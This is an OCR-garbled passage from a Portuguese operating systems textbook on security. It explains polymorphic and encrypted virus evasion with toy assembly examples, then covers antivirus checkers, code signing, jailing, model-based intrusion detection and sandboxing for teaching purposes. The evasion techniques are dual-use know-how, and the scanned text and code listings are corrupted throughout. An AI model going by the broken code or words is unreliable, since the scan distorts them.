da detecęao e gara mir que sua representaęao no disco nao 
seja parę ci da com sua represenraęao no banco de dados do 
software antiyfrus, Uma maneira de conseguir isso e cripto- 
grafar com uma chave diferente para cada arquivo infec- 
lado, Antes de fazer uma nova cópia, o yfrus gera um nit- 
mero aleatório de 32 bits como chave criptografica — por 
exemplo, fazendo um ou-exclusivo (XOR) da data/horario 
atual com o conteudo das palavras de memória 72.008 e 
319.992. Ele entao faz o ou-exdusivo de seu código com 
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O arquiwo e maior 
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Programa 
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Compressor 

Encriptador 
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I Figura 9.30 (a) Urn programa. (b) Um programa infectado. (o) Um programa compactado infectado, (d) Urn vfms criptografado. 
(e) Um virus compactado com código de cifragem com pac lado. 


essa chave, palavra por pakvra, para gerat o vims cripto¬ 
grafado que fica armazcnado no arquivo infectado, confor- 
mc ilusEra a Figura 9.30(d), A chave permanece ąrmazena- 
da no arąuwo. Por discrięao, deixar a chave no arquivo nao 
e o ideał, mas o objęlivo aqui e enganar o verificador de 
vfrus e nao inipedir que dedicados cientisias do laboraiório 
antmrus faęain a engenharia reversa do código, Ć óbvio 
que, para execmar, o virus deve primeiro se decriptar e, por 
isso, prerisa que o procedimento de decriptaęao tambem 
esteja no arquivo. 

Hssc esąuema ainda nao ć pcrfcilo, pois os procedi- 
mcntos de compressao, dcscom pressa o, criptografia e de- 
criplaęao sao os mesmos para lodas as cópias; portanto, o 
programa amivfrus pode usa-los como assinatura de vfrus 
para verifica-los. Ocultar os procedimenios de compressao, 
dcscompressao e criptografia e Mci!; e só criptografa-los 
com o restante do vfms, eon formę mostra a Figura 93Q(e). 
Todavia, o código de decriptaęao nao pode ser criptografa¬ 
do. Ele deve execntar no hardware para decriptar o restan- 
le do virus; desse modo, ele deve estar presente na lorma 
de iexio pum. Os programas antivirus sabem dissoe, assim, 
des caęarn a rotina de decriptaęao* 

Centurio, Virgilio gosta de fi car com a ultima palavra c, 
en tao, continua com o esąuema que segue* Suponha que o 
procedimenlo de decriptaęao prccise realizar o calcu lo 

X = (A + 8 + C “ 4) 

O código asscmbly mais simples para esse calculo, para um 
computador genirico com pelo me nos dois endereęos, e 
most rado na Figura 931 (a). O primeiro endereęo e a ori- 
gem; o segundo e o destino; p orla n to, MGV A,R1 move a 
variavd A para o regisirador R1. O código da Figura 9.31 (b) 
faz a mesma coisa, só que menos efiricntcmcnie, por causa 
das instruęóes NOR (nenhuma operaęa o) entremeadas com 
o código real. 


Mas nao e só issa* Tambem e possfyel disfaręar o código 
criptografko. Ha muitas ma n ci ras dc representar o NOR. 
Por exempIo r adidonando 0 a um regisirador, fazendo um 
OR consigo mesmo, deslocando-o 0 bit a esquerda e sal¬ 
ta mb para a próxima instruęao, todos resuitam em nada, 
Assim, o programa da Figura 9.31(c) e fundonalmenie o 
mesrno da Figura 9.31 (a). Ao copiar a si mesrno, o vfrus 
poderia usar a Figura 9.31 (c) em vez da Figura 9.31 (a) e, 
mais rarde, continuar funcionando. Um virus que sofre 
mutaęao a cada cópia e chamado de virus polimórfico. 
Agora, suponha que R5 naoseja necessario nesse peda- 
ęo de código. Eniao, a Figura 9.31 (d) e tambem equivalentc 
a Figura 9,31 (a). Por fint, em muitos casos e possivd irocar 
instruęóes sem alierar o que o programa faz; assim, chega- 
remos ao omro fragmemo de código da Figura 931 (e), que 
e logicamente equivaleme ao da Figura 931 (a). Um peda- 
ęo de código que pode mudar urna sequencia de instruęóes 
de maquina, sem alterar sua funcionalidade, e chamado 
de motor de mutaęao, e virus sofisticadoś contcm esse 
recurso para mudar o decriptador a cada cópia. A mutaęao 
pode conslsiir na inseręao de código inutil, embora prejudi- 
dal, na permuia enire instruęóes, na iroca emre regisLros e 
na substłtuięao dc u ma instruęao por outra equivalcntc. O 
próprio motor de mutaęao pode ser oculto, criptografando 
a si mesmo com o corpo do virus, 

Pedir a um pobre software amwfrus que perceba a 
transformaęao emre o código da Figura 9.31 (a) e o códi¬ 
go fundonalmenie equivalente da Figura 9.31 (e) e pedir 
demais, es pc ciał nieme se o motor de mutaęao tivcr mui¬ 
tas cartas na manga, O software antivirus pode analisar o 
código, para vcdficar o quc clc faz, c entao tentar simular 
a operaęao do código, mas lembre-se de que pode haver 
milhares de virus c de arqnivos para analisar c, porianto, 
nao ha mu i to tempo para lesiar, senao tudo ficara terrivel- 
menie lento. 
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MOV A.R1 

MOV A,R1 

MOV A ? R1 

MOV A,R1 

MOV A,R1 

ADD B,R1 

NOP 

ADD #0,R1 

OR R1 ,R1 

TSTR1 

ADD C,R1 

ADD B,R1 

ADD B,R1 

ADD B,R1 

ADDC.R1 

$UB #4,Ft1 

MOP 

OR R1 h R1 

MOV R1.R5 

MOV R1 ,R5 

MOV R1 X 

ADD C,R1 

ADDC.R1 

ADD C 3 R1 

ADD B r R1 


NOP 

SHL#0,R1 

SHL R1,0 

CMP R2.R5 


SUB #4,R1 

SUB S4,R1 

SUB #4,R1 

SUB «4,R1 


MOP 

JMP .+1 

ADD R5,R5 

JMP.+1 


MQV R1 h X 

MOV R1 ( X 

MOV R1 X 

MOV R1 ,X 




MOV R5 t Y 

MOV R5 n Y 

(a) 

(b) 

(0) 

W) 

W 


1 Figura 9,31 Exennplos de um v£rus polimórfico. 


Yale ainda mencionar que o armazenamemo na va- 
riavcl Y foi feilo apenas para dificuliar a delecęaG do folo 
dc que o código rclacionado o R5 ć um cod i go nulo, isto e, 
no o faz nada. Se omros fragmemos de código Ierern e es- 
creverem cni Y t o código parccera perfdiamenle legtlimo. 
Um motor de mulaęao bcm escnlo, que gere bons códigos 
polirnórfkos, pode causar pesadelos aos programadores 
dc software aniwirus, O unico lado bom disso e quc esse 
motor ć diffcil de pr ogra mar; desse modo, i od as os amigos 
dc Yirgilio usam o código dcle, o qne significa que nao ha 
mutios códigos diferenics cm cifculaęao*.* ainda. 

Ate agora, falamos apenas sobre lenlar recorthecer 
os vfrus cm arqirivos execuiavei$ infeelados. Al cm desses 
arąuiYOS, as verificadores de virus devem inspedonar o 
MBR, os seiores dc inidalizaęao, a lista de setares ruins, a 
flash ROM, a memória CMOS etc. Mas o quc fazer se houvcr 
um vfi us reskie me cm memória executando? Ele nao sera 
deiectado, Piór ainda: suponba que o vfnis cm cxecuęao cs- 
teja monit ora n do todas as chamadas de sistema. Ele pode 
fadlmente detectar quc o programa arnmrus esta lendo o 
setor de inicializaęao (procurando por um yftus). Para cn- 
ganar o programa animrus, o Yirus nao faz a cha mada de 
sistema, Em vez disso, cle apenas retorna o vcrdadciro setor 
de inicializaęao quc esta oculto na lista de seiores ruins. Ele 
tambem faz um Icmbrctc para remfcctar todos os aiqiiivoś 
quando o verificador de vfrus lenni nar sen trabalho. 

Para impcciir que um virus o engane, o programa am 
iivirus pode fazer leituras fisicas no disco, sem passar pelo 
sistema operadonal. Conludo, isso rcquer quc os driversde 
dispositiYos para IDE, SCSI e outros discos comuns estejam 
ernbutidos no software antivtru$, tomando o programa an- 
tivirtts menos portali! e sujeilo a fal bas em computadores 
quc usam discos incomuns, Alem disso, como a leitura nao 
esta passando pelo sistema operacionaL 6 pos$ivd ler o se¬ 
tor de imcializaęao, porem nao havera como ler os arquivos 
exmnaveis ł Ha ainda o perigo de o vfrus produzir dados 
forjados tambem sobre os arquivos executaveis. 

Vertficadores de integridade 

Urna abordagem completamente diferente de dctec- 
ęao dc viYus e a yerjficaęao de integridade, Um progra¬ 
ma antmYus que funciona dessa maneira primeiro pro¬ 
co ra pelo vfrus no disco rtgido, U ma vez convencido de 


que o disco esta lim po, ele ca lada urna soma dc venfica- 
ęao (checksum) para cada arqtiivo executavel. O algoritmo 
para esse calculo pode ser algo tao simptes quanio tratar 
o tcxto do programa como palavras i nici ras de 32 ou 64 
Mis e sorna-las — o que tambem pode resultar em um 
resutno crfplografico quase Imposswel dc ser revertido. 
Da próxima vcz que cxecutar r cle rc calcu lara todas as so- 
mas dc vcrificaęao c conferira se sao as mesmas quc esiao 
no arquivo de soma de vcrilicaęao. Um arquivo infectado 
aparecera i media ta menie, 

O próbie ma e que Yirgflio nao leva isso niiiUo a se¬ 
rio, Ele pode cscrever um vfrus que remova o arquivo de 
soma de vcrificaęao. Piór ainda, cle pode escrever um virus 
que ealculc a soma de verificaęao do arquivo infectado e 
substitua a anliga soma, no arquivo dc soma de verificaęao* 
Para se proteger contra esse lipo de eomportamento, o pro- 
grama antmYus pode tentar ocultar o arquivo de soma dc 
verifkaęao, mas isso ialvez nao funcione muito bcm, pois 
Yirgflio pode estudar detal ha damentc o progra ma amivfrus 
antes de escrever o vtrus. U rna ideia mci hor e criptogra fa¬ 
lo para deixar a adtdteraęao mais facil de deiectar. O ideał 
seria que a criptografia cnvolvesse o uso de um cartao inte- 
ligenle, eom urna chave ar ma ze na da exiernamente e que 
os programas nao pudessem obte-la. 

Verificadores de eomportamento 

Uma terceira estrategia usada pelo software amivfrns 
e o verifieador de eomportamento. Nessa abordagem, 
o programa antivfrus fi ca resideme em memória enąuanto 
o computador estivcr executando e captura todas as cha¬ 
madas de sistema. A ideia e monitorar todas as atividadcs 
c tentar capturar qualqiier corsa que parcęa suspeita. Por 
exemplo, ncnhtim programa normal dcvcria tentar sobres- 
crever o setor de imcializaęao; ponanto, uma lenta li va dc 
faze-lo quase que certa menie parte dc urn virus> Da mesma 
maneira, alterara memória flash ealtamente suspeito. 

Mas ha ainda casos cuja decisao nao e tao clara. Por 
exemplo r sobrescrevcr urn arquivo exccutavcl nao c uma 
corsa co mlim — a nao ser para um compilador. Sc o soft¬ 
ware antiyfrus dctecta essa cscrita e emite um alert a, com 
soi te o usuario pode saber se sobrescrever um arquivo 
executavel faz sem ido no contexto do sen trabalho aitiaL 
Da mesma maneira, sobrescrever um arquivo Joc com um 
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no vo documento repleto de ma er os nao e necessariameme 
o trabalho de um vfrus. No Windows, os programas podem 
se desvencilhar de sen arquivo executavel e permanecer 
residentes na memória, nsando urna diomada de sistema 
especial Novamente, isso pode ser legitimo, mas um alerta 
ao usuario seria util 

Os vfrus nao fkam obrigatoriamente passivos em al- 
gum lugar, esperando que um programa antmrus os exter- 
mine, como o gado sendo levado para o matadouro. Eles 
podem lutar. Pode ocorrer Lima batalha interessante se um 
vfrus e um antmrus residentes em memória se encontra- 
rem no mesmo compuiador. Ha algims a nos, existia um 
jogo chamado Core Wars , no qual dois programa dores se 
en (renta vam despejando um programa no espaęo de en- 
dereęamento livre, Os programas, por sua vez, exp!oram 
a memória, com o objęlivo de iocalizar e exterminar seti 
programa oponente anies que ele o exiermine. O confron- 
10 vfrus-amivfrus se parece com esse jogo, só que o campo 
de batalha e a maquina de alguns pobres usuarios que, na 
verdade, nao ąuerem quc isso ocorra, Piór ainda, o vfrus 
tern urna vantagem, pois sen escriior pode descobrir muiio 
sobre seu programa antmrus apenas comprando u ma có- 
pia dek* Claro, urna vez que o vfrus esteja la r a eąuipe de 
antmrus pode alierar seu código, foręando Virgf3io a com- 
prar urna nova cópia. 

Prevenęao contra virus 

Toda boa historia prccisa de u ma morał A morał desta e 

Md hor prevenir quc rmediar. 

Evitar os vrrus desek o principio e mais fadl que ten lar 
se livrar deles ąuando o compuiador estiver infectado* A 
seguir, eis a Ig u mas orientaęóes para usuarios indmduais, 
mas tambem ha algumas coisas que a ind Cisu ia em geral 
pode lazer para reduzir considcravdmente o probiernia* 

O que os usuarios padem lazer para eviiar urna infecęao 
por vfms? Frimeiro, escolher um sistema operacional que 
ofereęa um a! to gra u de seguranęa, com u ma front dra bem 
definida entre o modo nudeo e o modo usuario e com se- 
nhas de accsso ao sistema separadas para cada usuario e 
para o administrador do sistema. Sob essas condiędes, um 
vims que ademre nao consegue infectar os arquivos bina- 
rios do sistema. 

Em segundo lugar, instalar somente softwares ori- 
ginais, comprados de um fabricante confiavel. Isso aju- 
da bastante, mas nao e sinónimo de garantia plena, pois 
tein ocorrido ca sos nos ąuais fundonarios descontentes 
in dni ram virus em um produto comercial Transferir 
software, de siies da Web ou de BBS, e um comporta- 
mento de risco. 

Em terceiro lugar, comprar um bom pacote de software 
antmrus e usa-lo confonne as orientaęoes. Ccrtifique-se de 
obter as atualizaęóes do sitc do fabricante* 

Em quarto, nao clicar em anexos de mensagens eie- 
trónicas e dizer as pessoas para nao eiwiar mensagens com 


anexos. Enviar mensagens como um texto puro ASCII 
sempre e seguro, mas os anexos podem iniciar um v/rus, 
quando abertos. 

Em quinta frcąuenteniente faęa backups dos princi- 
pais arquivos em um meio externo, como disco fkxfvd, CD 
regravave! ou fna. Mantenha varias geraęoes de cada ar- 
quivo em diferemes meios de backup. Desse modo, se um 
vfrus for descoberto, havera como restaurar os arquivos 
em suas versoes anteriores a infecęao. Restaurar o arquivo 
infectado de outem nao aj u da, mas restaurar a versao da 
ultima semana pode ajudar. 

Finalmente, em sexto, resisiir a tenlaęao de copiar e 
executar airaentes programas gratuitos de urna fonte des- 
conhedda. Talvez exista urna razao para serem gratuitos — 
o produtor quer que seu compuiador se juntę a seu exercb 
to panicuiar de zmnbis, A execuęao de urn programa des- 
conhecido dentro de urna maquina virtual e segura caso 
voce possua software para taL 

A indusiria tambem pode levar as ameaęas dos vfms 
mais a serio e alierar algumas praiicas perigosas. Primeiro, 
fazer sistemas operacionais simples. Quamo mais adornos, 
mais buracos na seguranęa. Esse e um falo da vida. 

Em segundo lugar, csquecer os conteudos ativos. Do 
ponto de vista da seguranęa, isso e um desasire. Yisualizar 
um documento que alguern emia nao exige que o progra¬ 
ma desse alguern esteja execuiando. Osarquivos JPEG, por 
exemplo, nao contem programas e, assim, nao abrigam vf- 
rus. Todos os documemos deveriam funcionar desse modo. 

Em terceiro, dcveria havcr uma maneira dc proteger 
seletivamente cilindros espedficos do disco contra a escri- 
ta, a firn de iiupedir que os vfnis infectassem os programas 
que esiivessem nesses cilindros, Essa proteęao poderia ser 
implementada por um mapa de biis demro do comrola- 
dor, apresemando os cilindros proiegidos contra escriia. O 
mapa só deveria ser alleravel ąuaiido o usuario movesse 
uma chave niecą ni ca no painel fronlal do compuiador. 

Em quarto, a memória (lash 6 uma boa ideia, mas só 
deveria ser posswel altcra-la movendo-se uma chave ex- 
terna, algo que someme ocorresse quando o usuario es- 
iivesse consdente de esiar instalando uma atualizaęao do 
Bros, Claro, nada disso sera levado a serio enąuanio nao 
surgir um virus realmeme poderoso. Por exemp!o, um vf- 
rus que atinja o mundo financeiro e zere todas as contas 
bancarias, Obviamente, seria tarde demais. 

9.8.51 Assinatura de código 

Uma abordagem completamente diferente para man- 
ter longe o malware (lembre-se: defesa em profundidade) 
6 cxecutar somente softwares nao modificados dc fornc- 
ccdorcs confiavds. Uma pergunta quc stirgc rapidamente 
e como o usuario pode saber se o software vem mesmo do 
fornecedor citado e como pode garantir que nao foi modifi- 
cado desde que saiu da fabrica, Essa quesiao e especial men- 
te importante quando eopiamos o software de lojas yirmais 
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de reputaęao desconhedda on quando copiamos comroles 
ActiveX de sites, Se o controle ActiveX vem de um fabri- 
cante conhecido, e possfvel que nao contenha um cavaio 
de Troia, por exemplo, mas como sabcr ao certo? 

Oma inaneira ampla menie empregada e utilizar urna 
assmatura de código, eon formę descrito na Seęao 9.2.4. 
Se o usuario execma someme programas, pługi ns, drivers, 
comroles ActiveX e outros tipos de software que foram es- 
critos e assinados por fontes confiaveis, as chances de se 
meter eni problemas serao miiito menores. A conseąuen- 
da dc agir assim, entretanto, e quc o novo jogo gratuito c 
liiido da Snarky Software provavclmcntc e uma promessa 
boa dcmais para ser verdadcira e nao vai passar no tesle 
de assinatura, pois vocć nao sabc qucm esta por tras dcle, 

A assinatura de código baseia-se na cifragem de chave 
publica. Um fomecedor dc software gera um par (forma - 
do por uma chave pub li ca e uma chave particular), toru a 
a primeira piiblica e guarda cuidadosamente a segimda. 
Para assinar determinado software, o fomecedor primciro 
processa uma funęao de resumo do código para obter um 
nimi ero de 128, 160 ou 256 bits, dependendo do que sc 
utiliza — MD5, SHA-l ou SHA-256, Hm seguida, de assina 
o val<łi' do resumo cifrando-o com sua chave particular (na 
verdade, decifrando-a conforme most rado na Figura 9.2). 
Hssa assinatura acompanha o software onde ele for. 

Quando o usuario adquire o software, a funęao de 
resumo ć aplicada a ele e o resultado e $alvo, Ele, entao, 
decifra a assinatura que o acompanha utilizando a chave 
publica do fomecedor e compara o que o fomecedor diz ser 
a funęao de resumo com o que acaba de processar. Se fo¬ 
rem correspondentes, o software e considerado verdadeiro. 
Caso comrario, ele e rejeiiado como lalso. A matematica 
envolvida dificulta muidssimo a alteraęao do software por 
parte de quałquer pessoa, de modo que a funęao de resumo 
do program a sera eq utvalente aquela obtida pda decifra - 
gem da assinatura genutna. Ćigualmente dificil gerar uma 
nova assinatura falsa quc seja correspondeme sem que se 
tenha a chavc particular. O processo dc assinatura c vcrifi- 
caęao ć most rado na Figura 932, 


As paginas da Web podem conter códigos como con- 
trołes ActiveX, mas lambem códigos escritos em diferentes 
Imguagens de script, Eles geralmente sao assinados e, nesse 
caso, o navegador automaticaniente avalia a assmatura. Ź 
claro quc, para vcrifka-la, o navegador prccisa da chavc 
publica do fomecedor, que normalmcnte acompanha o có¬ 
digo com um cenificado emitido por uma autoridade ccr- 
tificadora que garanta a autenticidadc da chave publica, Sc 
o cenificado for emitido por uma autoridade que o nave- 
gador desconheęa, o usuario e notificado por uma caixa de 
dialogo e deve decidir se aceita ou nao o cenificado. 

9.8.41 Encarceramento 

Um antigo ditado russo diz: 'Confie, mas verifique". 
Certa menie quem criou cssa frasc esiava pensa ndo em 
software. Mcsmo com o software assinado, c uma boa 
pratica verificar se de esta se comportando corretamente, 
Uma das tecnicas para fazer isso c a denominada encarce- 
ramento, conforme mostra a Figura 933. 

O próg rama recem-adquirido e cxcciHado como o pro¬ 
cesso denominado 'prisioneiro' na figura, O 'encarceradoC 
e um processo conftavd (do sistema) quc monitora o com- 
portamento do prisioneiro. Quando um processo encarce- 
rado faz uma chamada de sistema, antes de ser exeauada, 
o controle e transferido ao encarcerador (por meio dc um 
desvio do nueleo) e o numero e os parametros da chamada 
sao diredonados para de. Ele, entao, dccidc se a chamada dc 
sistema deve ser permitida. Se o processo encarcerado tentar 
abrir uma conexao de rede com um liospedciro remoto des- 
conhecido, por exemplo, a chamada pode ser recusada e o 
prisioneiro, mono, Se a chamada de sistema for aceita, o en¬ 
carcerador informa ao nudco r quc a cxccuta. Dessc modo, 
os componamentos inadequados podem ser identificados 
antes que causem problemas. 

Existem diferentes implementaęóes de encai ceramen- 
to. Uma que funciona em ąuase todos os sistemas UNfX, 
sem modificar o nueleo, ć descrita por Van't Noordende et 
al. (2007). Grossomodo, oesąuema utiliza os recursos normais 


Fomecedor de software Usuario 



I Figura 9.32 Como funciona a assinatura de código. 
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1 Figura 9.33 A operaęao de encarceramento. 


de depuraęao do UNIX e o encarcerador faz o papel de de* 
purador enquanto o prisioneiro faz o papel de depurado. 
Sob essas ciramstancias, o depurador pode instmir o nu- 
deo para eocapsular o depurado e rcpassar a de todas as 
chamadas dc sistcma para que sejam i lis peri on ad as, 

_ 9.8.51 Detecęao de intrusao baseada em 

modelo 

Guira abordagem de defesa da maquina e a instala- 
ęao de um IDS (mtrusbn detectm system —sistema de detecęao 
de intrusao). Existem dois tipos basicos desse sistema: um 
voltado a inspeęao dos pacotes da rede e outro dedicado a 
analisar as anomalias na CPU. Menrionamos rapidamente 
os IDSs de rede no comexto de uso dc firewalls e agora fa- 
larcmos um pouco sobre os IDSs bascados cni hospedciros, 
cmbora as limitaęoes dc espaęo nos impeęam dc abordar os 
vados lipos de IDSs existmtes. Yamos, entao, falar dc um 
lipo especifico para ter u ma kida de como cle funciona. 
Hsse lipo se chama detecęao de intrusao baseada em 
modelo (Wagner e Dean, 2001) e pode ser implementado, 
entre out ras for mas, por me i o da tecnica de encarceramen- 
lo discutida ameriormente. 

Na Figura 9.34(3), vemos um peąueno programa que 
aL>re um arquivo chamado dades e le um caraciere por vcz 
ate que alcance o byle zero — porno no qual exibe o nu- 
mero de bytes diferenfes de zero no infcio do arqmvo e 
encerra a execuęao. Na Figura 9.34(b), vemos um grafico 
das chamadas de sistcma fcitas por csse programa (onde 
print chama write). 

O que esse grafico nos diz? A primeira chamada de 
sistcma feita pelo programa, sob quaisquer ciramstancias, 
e sempre opem A próxima chamada e read o u write, depen- 
dendo da seąucncia seguida pelo if, Se a segunda chamada 
for write, significa que o arquivo nao pode ser aberto e a 
próxima chamada dcvera ser exlt. Se a segunda chamada 
for read, pode existir um ntimero arbitrariamente alto dc 
chamadas read c chamadas cvcntuais a etose, write c exit Na 
auscncia de um imasor, nenhuma outra seąuenda e pos* 
sfveL Se o programa for enearcerado, o encarcerador vera 
lodas as chamadas de sistema e pociera verificar facilmente 
se a seąuenda e valida. 


Agora suponha que alguern encontre um erro nesse 
programa e consiga causar um transbordamento do buffer 
e inserir e execuiar código hostii que, quando executado r 
muito possiveImente executara u ma sequenda drferente 
dc chamadas dc sistcma. Ele pode, por cxcmplo, tentar 
abrir um arquivo quc deseja copiar ou tentar abrir urna 
conexao de rede para td c forta r para casa, Na primeira cha¬ 
mada de sistcma que nao coincidir com o padrao, o encar¬ 
cerador percebe que hotiye um ataqtie e pode agir, matan- 
do o processo e akrtando o adminisirador do sistema, por 
exeinplo. Dessa forma, os sistemas de detecęao de intrusao 
podem idemificar ataques enquanto eles estao acontecen- 
do. A analise estatica de chamadas de sistema e somente 
uma das muitas maneiras de trabalho dos IDSs. 

Ouando esse lipo estatico de detecęao de intrusao ba¬ 
seada em modelo e enrpregado, o encarcerador precisa co- 
nhecer o modelo (o grafico de chamadas de sistema, por 
exemplo). A maneira mais rapida de ele aprender o modelo 
e fazer com que o compilador o gere e obrigar o autor do 
programa a assina-lo e anexar seu certiflcado. Dessa forma, 
qualquer temat! va de modificaęao do programa executa- 
vd sera detectada quando for executada r ja que o compor- 
tamento nao estara conforme o comportamento assinado 
esperado, 

Infdizmente, e possfvel que um a taca nie esperto inicie 
o que chamamos de ataque por mimetismo, no qual o 
código inserido faz as chamadas de sistema da maneira que 
se espera que o programa o faęa (Wagner e Soto, 2002). 
Assim sendo, sao necessarios modelos mais sofisticados do 
quc o simpies controle de chamadas dc sistcma. Ainda as¬ 
sim, um IDS pode ter urn papci importante se considerar- 
mos a defesa cm profundidade. 

int cnaEn(int arge *char argv[]) 

{ 

int fd, n = 0: 
char buf[1j; 

fd = op 0 n(' T data 1 ', 0); 
if (fd < 0) { 

printf('Arquivo de dados 
inyatido^ 1 *); 

} else { 
while {1} { 

readtfd, buf, 1); 
if (buf[0] == 0) ( 
close(fd); 

printfCn = %d\n" t n); 
exit(0): 

} 

n = n + 1; 

i 
i 

} 

(a) 

I Figura 9.34 (a) Um programa. (b) Grafico de chamadas de 
sistema para (a). 
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Uin sistema de 1DS baseado em modelo nao e o unico 
tipo. Muitos lDSs fazem tiso de um conceito chamado cha- 
rnariz, que e um desvio configurado para atacar e pegar 
crackcrs e malware. Ele normalnienie e unia maąuina iso- 
iada com poucas defcsas c um contcudo aparenteniente va- 
lioso, pronto para ser roubado. As pcssoas quc configu ram 
o chamariz monitoram cuidadosamenlc quaisquer ataąucs 
a maąuina e tentam aprender mais sobre a natureza da in- 
va$ao + Alguns IDSs colocam seus chamarizes em maąuinas 
virtuais para eviiar danos ao sistema rea! subjaceme* Con- 
forme ja discutimos, o malware namralmenie tema desco- 
brir se esta funcionando em unia maąuina vimial 

9.8.61 Encapsulamento de código móvel 

Os vfi u s e os vermes sao programas que en \ ram em um 
computador sem o conhccimento do proprietario e contra 
sua vontade. Algumas vezcs, comudo, as pcssoas — mais ou 
men os intenctonał menie — importam e exccutam códigos 
extemo$ em suas maąumas. Normalnienie isso a co niece da 
seguinte maneira: em um passado rernoio (que, no mu li¬ 
do da internet, signłfka poueos anos atras), a maioria das 
paginas da Web consistia apenas cm arquivos HTML cstaii- 
cos, coni alguma imagem assoriada. Atualmente, cada vez 
mais as paginas contćm pcąucnos programas (ou peąuenas 
aplicaędes) chamados applets. Quando uma pagina com 
applets e transferida, as applets sao buscadas e executadas. 
Por exemplo, luna applet pode conier um fonrtulario a ser 
preenchido, a tern de uma aj u da interaliva para seu preen- 
ebimemo, Quando o form ulano estivcr preenchido, de po- 
dera ser enviado a algurn lugar da Internet, para que possa 
ser processado. Formularios de impostos, formularios de 
pedido dc produtos e muitos outros tipos de formularios 
podcm se bencficiar dessa a hord a gem. 

Outro exemp!o no qual programas sao transportados de 
uma maąuina para outra, para executar na maąuina dedesti- 
no, sao os agentes — programas lanęados por um usuario 
para rcalizar a Ig uma ta ref a e, entao, emitlr um relató- 
rio. Por excmplo, um agente pode ser instado a vcrificar 
alguns sites dc viagcns para cncontrar o voo mais ba rato 
enirc Amsterda c Sao Francisco. Chegando a cada sitc, o 
agente deve execuiar e obter a informaęao necessaria. En¬ 
tao, ele se move para o próximo sile. Qnando tu do estiver 
pronto, ele pod era vol lar para casa e relatar o que aprendeu. 

Uin tcrcciro exemplo dc código móvel e um arqui- 
vo PostScript, que deve ser impresso em uma impressora 
PostScript. Um arquivo PostScript e, na verdade, um pro- 
grama escrito na tinguagem PostScript e executado dentro 
da impressora. Normalmente ele manda a impressora de- 
senhar certas curvas e preencher seus interiores, mas ele 
pode fazer qualquer coisa. As applets, os agentes c os arqui- 
vos PostScript sao apenas tres exemplos de código móvel, 
porem, ba muitos outros, 

Pela langa discussao anterior sobre vfrus e vermes, 
deve estar dar o que permitir ąue códigos externas executem 


em sua maąuina e mais ąue um peąueno risco. Todavia, 
algumas pessoas gostariam de executar esses programas 
alieingenas e, assim, surge a ąuestao: "Os códigos móveis 
podcm executar de uma forma segura?*. Uma resposta 
cuita c: "Sim, mas nao c faril". O problcma fundamental e 
quc, ąuando um proccsso importu urna applet ou um outro 
código inóvcl em seu cspaęo dc endercęamento c o cxecu~ 
ta, esse código executa como parte de um proccsso valido 
do usuario e tern todo o poder que o usuario tern, indu- 
sive a capacidade de ler, escrever f apagar ou criptografar 
os arquivos do disco do usuario, enviar dados pelo correio 
eletrónico para outros pafses e muito mais. 

Ha muito tempo, os sistemas opcracionais descnvolvc- 
rain o conceito dc proccsso para construir barreiras entre 
os usuarios. A ideia e ąue cada proccsso tenha sen próprio 
espaęo de cndereęamento protegido e sua própria U10, 
permitmdo-llie iraballtar com os arquivos e outros recur- 
sos que Ihe perienęam, mas nao com os recursos dos outros 
usuarios. Quando se quer proteger uma parte do proccsso 
de outra parte do processo (a applet), o conceito de pro- 
cesso nao ąjuda. O conceito de thread permite que varios 
threads existam dentro dc um processo, contudo nao per 
mite quc um thread sc proteja dc outro, 

Teoricameme, execntar cada applet como um processo 
separado aj uda um pouco, mas muitas vezes e inviavel. Por 
exempło, uma pagina da Web pode comer duas ou mais 
applets que interajam umas com as outras e tambem com 
dados na pagina. Tainbem pode ser necessario que o vi- 
suaJizador da Web interaja com as applets, inidando-as e 
parando-as, alimentando-as com dados, entre ouiras coi- 
sas, Sc cada applet for inscrida cm scu processo próprio, o 
mccanismo como um todo nao fundonara, Alem dtsso, co- 
iijcar uma applet em scu próprio espaęo dc cndereęamento 
nao okręcę qualquer dificuldadc para a applet roubar ou 
danificar dados. No mmimo, seria ate mais fadl pois nin- 
guem poderia ve-la. 

Vnrios novos metodos de Udar com applets (e códigos 
móveis cm gcral) vcm sendo propostos c implcmcntados, 
A seguir, estudarcinos dois desses metodos: a caixa de areia 
c a interpretaęao, Alem deles, a assinatura de código tam¬ 
bem pode ser utilizada para verificar a fonie da applet, 
Cada um tern suas próprias foręas e fraąuezas. 

Caixa de areia 

O primeiro metodo, chamado caixa de areia (sand- 
boxin 0 } t tenta confinar cada applet a um intervak> limita- 
do de endereęos virtuais gerados em tempo de execuęao 
(Wahbe et aL, 1993). Fu n ci on a dmdindo-sc o espaęo de 
cndereęamento virtuai em regioes de tamanhos iguais, que 
charnaremos de caixas de areia. Toda caixa de areia devc 
apresenlar a seguinte propriedade: todos os seus endercęos 
compartilham alguma cadeia de bits de orderu mais alta. 
Um cspaęo de cndereęamento de 32 bits poderia ser divi- 
dido cm 2 5ó caixas de areia dc ló MB; portanto, todos os 
endeieęoś dentro dc urna caixa de areia tcriam cm comum 
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os 3 bits mais signifkativos. Da mesma maneira, poderia- 
mos ter 512 caixas de areia de S MB, cada uma com nm 
prefixo de endereęo de 9 bits. O tamanho da caixa de areia 
devc ser escolhido de modo que a maior applet caiba nela 
sem despcrdięar muito cspaęo de cndcrcęamcmo virfual. 
A cxistcncia dc memória fisica na o ć tao importantc sc 
houver paginaęao por dcmanda — como cm gcral ha* Para 
cada applet, sao oferecidas duas caixas de areia: uma para 
código e outra para dados, eon formę ilustrado na Figura 
9.3 5 (a), para o caso de 16 caixas de areia com 16 MB ca da. 

O conceko basico da caixa dc areia e garamir quc unia 
applet nao seja capaz dc salt ar para urn código cxicmo a 
sua caixa dc areia dc código ou quc nao referencie dados 
fora dc sua caixa dc areia de dados. A razao da existcncia 
de duas caixas de areia e impedir que uma applet modi- 
fique sen código durante uma execuęao que vio!e essas 
restrięoes* fmpedindo que se armazene algo na caixa de 
areia de código, elimina-se o perigo de o código alterar a si 
mesmo. Enqtianto uma applet esta confinada dessa manei¬ 
ra, ela nao consegue danlficar o visualizador nem outras 
applets, aletn de nao poder implamar virus na memória ou 
danlficar a memória dc algnm outro modo. 

Assim que e carregada, uma applet e realocada para 
o i mci o de sua caixa de areia. Depois, sao verificadas se as 
referencias ao código e aos dados estao confinadas a caixa 
de areia apropriada. Na discussao a seguir, estudaremos 
apenas as referencias ao código (isto e, as instruęoes JMP e 
CALLJ, mas o mesmo ocorre para as referencias aos dados. 
As mstruęoes JMPs estaticas, que usam endereęamento 
direto, sao faceis dc vcrificar: o endereęo dc destino esta 
dentro dos limit es da caixa dc areia do código? Da mes- 
